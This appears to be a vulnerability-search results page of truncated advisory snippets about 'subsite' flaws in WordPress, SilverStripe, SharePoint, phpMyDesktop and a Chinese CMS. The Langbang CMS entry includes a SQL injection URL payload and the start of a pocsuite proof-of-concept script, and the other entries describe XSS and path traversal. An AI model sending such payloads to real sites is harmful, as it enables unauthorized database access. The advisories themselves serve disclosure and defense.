PT-2026-36572
Name of the Vulnerable Software and Affected Versions: Import and export users and customers plugin for WordPress versions prior to 2.0.9. Description: An issue exists in the save extra user profile fields function where an incomplete blocklist fails to restrict capability meta keys for subsites in ...
EUVD-2006-3103
Malware in sbrugna...
SilverStripe Subsite weakens file permissions
The subsites module can weaken edit restrictions on some files and allow a malicious user to edit files they do not have edit rights to. This only affects projects with the subsites module installed. Regression testing should focus on custom file logic. Be advised that this is not a case of a use...
GHSA-CX45-565Q-6QX8 SilverStripe Subsite weakens file permissions
The subsites module can weaken edit restrictions on some files and allow a malicious user to edit files they do not have edit rights to. This only affects projects with the subsites module installed. Regression testing should focus on custom file logic. Be advised that this is not a case of a use...
CVE-2022-42949 - Subsite weakens file permissions
More info at https://www.silverstripe.org/download/security-releases/cve-2022-42949...
Description of the security update for SharePoint Server Subscription Edition: April 12, 2022 (KB5002191)
Description of the security update for SharePoint Server Subscription Edition: April 12, 2022 KB5002191 Summary This security update resolves a Microsoft SharePoint Server spoofing vulnerability and Microsoft Excel remote code execution vulnerability. To learn more about the vulnerabilities, see...
Description of the security update for SharePoint Server 2019: April 12, 2022 (KB5002180)
Description of the security update for SharePoint Server 2019: April 12, 2022 KB5002180 Summary This security update resolves a Microsoft SharePoint Server spoofing vulnerability. To learn more about the vulnerability, see Microsoft Common Vulnerabilities and Exposures CVE-2022-24472. Note: To...
syba.sa XSS vulnerability
Open Bug Bounty ID: OBB-300271

Description| Value
---|---
Affected Website:| syba.sa
Open Bug Bounty Program:| Create your bounty program now. It's open and free.
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1...
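狼邦 (Langbang) content management system SQL injection vulnerability /bssh
The 狼邦 (Langbang) content management system is currently at version V8.0; development language: ASP.NET 4.0; database: SQL2005; runtime environment: Windows2003/NT + IIS6.0. It is mainly used to build websites for government bodies, schools, enterprises and public institutions, and individuals in Guizhou and other regions. /Webwsfw/bssh/?subsite=1%20and%201select%20@@version-- !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils...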
CVE-2006-3106
Cross-site scripting (XSS) vulnerability in index.php in phpMyDesktop|Arcade 1.0 allows remote attackers to inject arbitrary web script or HTML via the subsite parameter in the subsite todo...
CVE-2006-2747
Directory traversal vulnerability in index.php in PhpMyDesktop|arcade 1.0 FINAL allows remote attackers to read arbitrary files or execute PHP code via a .. (dot dot) sequence and trailing null (%00) byte in the subsite parameter in a showsubsite todo...
Hosting Controller 0.6.1 - User Registration (1)
Hosting Controller 0.6.1 - User Registration 1 Domain: Username: INPUT type="hidden" name="htype" value="27" id="htyp...